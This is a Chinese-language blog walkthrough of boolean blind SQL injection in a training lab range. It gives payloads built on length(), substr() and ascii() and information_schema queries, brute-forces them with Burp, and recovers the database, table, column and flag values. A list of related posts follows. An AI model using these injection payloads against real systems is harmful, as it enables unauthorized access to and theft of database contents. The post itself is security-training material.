SQL注入(盲注)---zkaq

已于 2022-04-21 23:35:49 修改
阅读量1.6k 收藏 5
点赞数 1
分类专栏: WEB安全---zkaq靶场 文章标签: web安全
于 2022-04-06 00:22:47 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_38237216/article/details/123980651
版权

1.概念

盲注:有时目标存在注入,但在页面上没有任何回显,此时,我们需要利用一些方法进行判断或者尝试得到数据,这个过程称之为盲注。

盲注种类:

  • 布尔盲注:根据注入信息返回Ture或者flase,无之前类似的报错信息
  • 时间盲注:无论输入任何值,返回信息都会按照正常情况处理,加入特定的时间函数,通过web页面的返回时间差来判断注入的语句是否正确

常用的函数:

  • length():返回字符串的长度
  • substr():截取字符串
  • ord()/ascii():返回字符串的ascii码

2.靶场

1)测试是否存在sql注入

使用and 1=1 和 and 1=2测试

确认存在sql注入

2)判断字段数

使用order by

存在两个字段数

3)尝试显错注入爆库

显错注入爆库发现无回显

4)使用盲注猜

涉及函数:

  • length():字符串长度
  • substr():截取字符串;substr(截取的内容,截取的位数,截取的个数)
  • ascii():编码函数

a.使用length(database())爆出数据库的长度

数据库名长度为12

b.使用ascii(substr(database(),1,1))=97payload,使用burp抓包爆破

设置跑包参数

c.根据attack结果,得到库名1-12位的ASCII码为107,97,110,119,111,108,111,110,103,120,105,97.通过查对应的ASCII码可以得到库名为 kanwolongxia

4)判断表名

a.先判断表名长度

and length((select table_name from information_schema.tables where table_schema=‘kanwolongxia’ limit 0,1))=6,得到数据库中某一表名长度为6

b.参照跑数据库名的方式,使用and ascii(substr((select table_name from information_schema.tables where table_schema=‘kanwolongxia’ limit 0,1),1,1))=100用burp继续跑包,得到表名1-6的ascii码为108,111,102,108,97,103,通过查对应的ASCII码可以得到表名为loflag

5)判断字段名

a.先判断字段名长度,使用and length((select column_name from information_schema.columns where table_name=‘loflag’ limit 1,1))=6得到字段名长度为6

b.参照跑数据库名的方式,使用and ascii(substr((select column_name from information_schema.columns where table_name=‘loflag’ limit 1,1),1,1))=100用burp继续跑包,得到字段名1-6的ascii码为102,108,97,103,108,111,通过查对应的ASCII码可以得到字段名为flaglo

6)查询flag

a.先判断数据长度,使用and length((select flaglo from loflag limit 0,1))=8,可以确定数据的长度为8

b.参照跑数据库名的方式,使用and ascii(substr((select flaglo from loflag limit 0,1),1,1))=100用burp继续跑包,得到数据1-6的ascii码为122,75,97,81,45,81,81,81,通过查对应的ASCII码可以得到数据为zKaQ-QQQ

real_plot
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
SQL注入(盲注)
a12332251的博客
12-07 926
SQL
SQL注入工具-御剑
06-07
【描述】:“SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑SQL注入工具-御剑” 描述中的重复部分强调了御剑作为SQL注入工具的核心属性。SQL注入是黑客通过构造恶意的SQL语句...
DNS-log注入(zkaq靶场
v2ish1yan的博客
04-21 1287
DNS-log注入
变量覆盖 --- zkaq
weixin_38237216的博客
04-27 1926
1.概念 1.变量覆盖:变量覆盖指的是可以用我们的传参值替换程序原有的变量值 2.常见的变量覆盖的危险函数 extract()函数:将数组中变成变量 举例:<?php $a = “1”; $my_array = array(“a” => “Cat”,“b” => “Dog”, “c” => “Horse”); extract($my_array); echo “$a = $a; $b = $b; $c = $c”; ?> 运行结果:$a = Cat; $b = Dog; $
sql注入盲注
最新发布
weixin_64815500的博客
06-19 960
sql注入关于无回显用到的盲注,sqli-labs靶场为例子讲解常用盲注类型以及函数。面试或者打ctf可用作参考
SQL注入2——盲注(重学)
qq_52263650的博客
11-07 3780
SQL注入2——布尔型盲注(重学)
SQL注入盲注
xiao_he0123的博客
03-20 6996
SQL注入盲注前言一、盲注分类二、具体解析1.基于布尔的sql盲注首先要先了解一下sql注入截取字符串常用的函数:(1)mid()函数(2)substr()函数(3)left()函数具体注入方法2.基于时间的SQL盲注3.基于报错的SQL盲注1.extractvalue()函数2.uodatexml()函数3.floor()函数 前言 何为盲注盲注就是在 sql 注入过程中,sql 语句执行的选择后,选择的数据不能回显 到前端页面 一、盲注分类 盲注分为三类: (1)基于布尔的SQL盲注 (2)基于事
SQL注入笔记-union联合查询
03-21
SQL注入笔记-union联合查询
31-31.渗透测试SQL注入盲注
05-10
渗透测试SQL注入盲注
超级SQL注入工具-web-sql
10-28
超级SQL注入工具是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入 支持Bool型盲注、错误显示注入、Union注入,支持Access、MySQL5以上版本、SQLServer、Oracle...
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
SQL注入技巧-盲注暴库详细技巧及实例
10-11
个人通过拜读各位前辈们的博文以及大量的ctf题目训练,结合挖洞经验整理的几点sql常用的盲注技巧,结合具体的sql指令加深理解,针对常用的防护技术,总结了几种通用的绕过技巧
史上最详细的SQL盲注入门教程
weixin_44867191的博客
05-16 1378
正常情况下,用户输入用户名id,就能查到用户信息,但是如果攻击者输入的内容是:666' or '1'='1,那么查询的SQL语句就变成SELECT name,age FROM users WHERE user_id = '666' or '1'='1',由于1=1恒成立,就会执行SQL,执行后,就会返回所有的学生信息,有回显信息,这就是典型的。如果执行SQL后,应用程序不显示任何具体的数据,可能只是告诉我们查询成功或者查询失败,或者什么都不说,没有回显,但是SQL还是执行了,SQL注入发生了,这就是。
SQL注入-盲注
m0_72125469的博客
11-24 252
SQL注入系列-盲注
SQL注入盲注(小白的学习)
lgsyydsa的博客
06-04 576
对length列从小到大或者从大到小排列,会发现有一些结果的长度与大部分的长度不同,如果还是不知道可以在下面response的render中会有图显示。所以我们可以通过修改substr中第二个参数来进行判断,但是这样会浪费大量的时间。注意:limit 0,1 表示是第一张表,如果爆出来的表不太像有flag的,可以修改limit 第一个参数,继续爆下一个表名。第一个参数由于不知道表名长度,可以设置为10,第二个参数设置同上,爆破完后将长度进行排序可知表名为flag,这很ctfhub。所以先判断数据库的长度。
[zkaq靶场]SQL注入--POST注入
wwxxee
05-08 447
SQL注入–POST注入 POST注入 POST型注入与GET型注入没有本质区别 POST注入一 输入账号密码,然后抓包 检测出单引号闭合的方式,接下来就可以进行注入. 检测出字段数 username=admin’ order by 3–+&password=1&submit=%E7%99%BB%E5%BD%95 检测回显点 ![] 爆库 username=admin1’ union select 1,2,database()–+&password=1&su
[zkaq靶场]SQL注入--DNS-LOG注入
wwxxee
05-08 242
DNS注入 介绍 在某些无法直接利用漏洞获得回显的情况下,但是目标可以发起请求,这个时候就可以通过DNS请求把想获得的数据外带出来。 对于sql盲注,常见的方法就是二分法去一个个猜,但是这样的方法麻烦不说,还很容易因为数据请求频繁导致被ban。 所以可以将select到的数据发送给一个url,利用dns解析产生的记录日志来查看数据。 原理 通过子查询,将内容拼接到域名内,让load_file()去访问共享文件,访问的域名被记录 此时变为显错注入,将盲注变显错注入,读取远程共享文件,通过拼接出函数做查询,拼接
[zkaq靶场]变量覆盖--duomi cms通杀漏洞
wwxxee
05-12 994
变量覆盖 变量覆盖:值我们可以用我们的传参值去替换程序原有的变量值。 经常导致变量覆盖漏洞场景有: $$使用不当; extract()函数使用不当; parse_str()函数使用不当; import_request_variables()使用不当,开启了全局变量注册等。 $$ 导致的变量覆盖问题在CTF代码审计题目中经常在foreach中出现,如以下的示例代码,使用foreach来遍历数组中的值,然后再将获取到的数组键名作为变量,数组中的值作为变量的值。因此就产生了变量覆盖漏洞。 例如: <?php
[zkaq靶场]逻辑漏洞--验证码绕过(UsualToolCMS)
wwxxee
05-09 2658
逻辑漏洞–验证码绕过、密码找回漏洞 验证码绕过的常用姿势: 一、前端验证验证码,并没有后端验证。直接抓包然后进行跑数据包,反正有没有验证码的阻碍 二、验证码设置了但是并没有效验,乱输验证码也能够成功的登录 三、验证码可以重复使用,比如现在的验证码1111,然后虽然你登录失败后验证码会变,但是你输入1111他却判定你验证码正确(常见)https://www.uedbox.com/post/14207/ 四、.验证码空值绕过,比如,我们现在抓一个包,发现登录参数是user=admin&password=
SQL注入实战:sqli-labs实验详解
"sqli-labs实验指导手册详细介绍了如何通过搭建sqli-labs实验平台来学习和实践SQL注入攻击及防御。本实验手册主要针对基于单引号的字符型联合注入进行深入解析,帮助读者理解SQL注入的原理,并提供逐步解密数据库...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值